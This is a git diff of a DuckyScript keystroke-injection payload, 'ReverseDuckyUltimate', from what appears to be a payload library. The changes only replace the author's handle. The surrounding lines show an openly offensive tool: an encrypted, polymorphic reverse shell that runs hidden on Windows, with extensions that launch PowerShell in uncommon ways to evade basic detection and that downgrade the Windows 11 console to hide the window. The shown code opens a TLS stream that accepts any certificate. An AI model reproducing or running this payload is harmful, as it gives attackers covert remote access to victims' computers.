3.0 implentation and ideas: - Daniel Bohannon diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt index 683e8f7..6496cb0 100644 --- a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt +++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt @@ -1,7 +1,7 @@ REM ReverseDuckyUltimate REM Version 1.3 REM OS: Windows / Unix -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed. @@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell +REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell EXTENSION ROLLING_POWERSHELL_EXECUTION REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum REM Starts Powershell in uncommon ways to avoid basic detection @@ -131,7 +131,7 @@ END_EXTENSION EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: @@ -164,7 +164,7 @@ END_EXTENSION EXTENSION WINDOWS11_CONSOLE_DOWNGRADE REM_BLOCK Version: 1.0 - Author: 0iphor13 + Author: 0i41E Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. END_REM @@ -380,7 +380,7 @@ ELSE_DEFINED Polymorphism2() STRING .GetStream(); STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); - STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false); + STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false); Polymorphism3() STRING =new-object System.IO.StreamWriter($sSL); STRING $sSL.write(